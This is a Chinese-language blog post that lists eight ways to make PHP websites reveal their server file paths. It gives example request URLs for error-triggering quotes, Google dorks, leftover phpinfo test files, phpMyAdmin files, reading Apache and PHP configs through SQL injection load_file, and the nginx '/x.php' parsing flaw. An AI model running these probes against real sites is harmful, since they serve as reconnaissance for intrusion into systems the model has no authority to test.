php爆路徑方法總結

1、單引號爆路徑

  直接在URL後面加單引號,要求單引號沒有被過濾(gpc=off)且服務器默認返回錯誤信息。

  www.xxxx.com /news.php?id=149′

  2、錯誤參數值爆路徑

  將要提交的參數值改成錯誤值,比如-1。單引號被過濾時不妨試試。

  www.xxxx.com /researcharchive.php?id=-1

  3、Google爆路徑

  結合關鍵字和site語法搜索出錯頁面的網頁快照,常見關鍵字有warning和fatal error。注意,如果目標站點是二級域名,site接的是其對應的頂級域名,這樣得到的信息要多得多。

  Site:xxxx.com warning

  Site:xxxx.com “fatal error”

  4、測試文件爆路徑

  很多網站的根目錄下都存在測試文件,腳本代碼通常都是phpinfo()。

  www.xxxx.com /test.php

  www.xxxx.com /ceshi.php

  www.xxxx.com /info.php

  www.xxxx.com phpinfo.php

  www.xxxx.com /php_info.php

  www.xxxx.com /1.php

  5、phpmyadmin爆路徑

  一旦找到phpmyadmin的管理頁面,再訪問該目錄下的某些特定文件,就很有可能爆出物理路徑。至於phpmyadmin的地址可以用wwwscan這類的工具去掃,也可以選擇google。PS:有些BT網站會寫成phpMyAdmin。

  www.xxxx.com /phpmyadmin/themes/darkblue_orange/layout.inc.php

  www.xxxx.com /phpmyadmin/libraries/select_lang.lib.php

  www.xxxx.com /phpmyadmin/index.php?lang[]=1

  6、配置文件找路徑

  如果注入點有文件讀取權限,就可以手工load_file或工具讀取配置文件,再從中尋找路徑信息(一般在文件末尾)。各平臺下Web服務器和PHP的配置文件默認路徑可以上網查,這裏列舉常見的幾個。

  Windows:

  c:\windows\php.ini php配置文件

  c:\windows\system32\inetsrv\MetaBase.xml IIS虛擬主機配置文件

  Linux:

  /etc/php.ini php配置文件

  /etc/httpd/conf.d/php.conf

  /etc/httpd/conf/httpd.conf Apache配置文件

  /usr/local/apache/conf/httpd.conf

  /usr/local/apache2/conf/httpd.conf

  /usr/local/apache/conf/extra/httpd-vhosts.conf 虛擬目錄配置文件

  7、nginx文件類型錯誤解析爆路徑

  這是昨天無意中發現的方法,當然要求Web服務器是nginx,且存在文件類型解析漏洞。有時在圖片地址後加/x.php,該圖片不但會被當作php文件執行,還有可能爆出物理路徑。

  www.xxxx.com /top.jpg/x.php

  8、其他

  其他就是像dedecms、phpwind之類的整站程序爆路徑漏洞,比較雜,通用性不強。

發表評論
所有評論
還沒有人評論,想成為第一個評論的人麼? 請在上方評論欄輸入並且點擊發布.
相關文章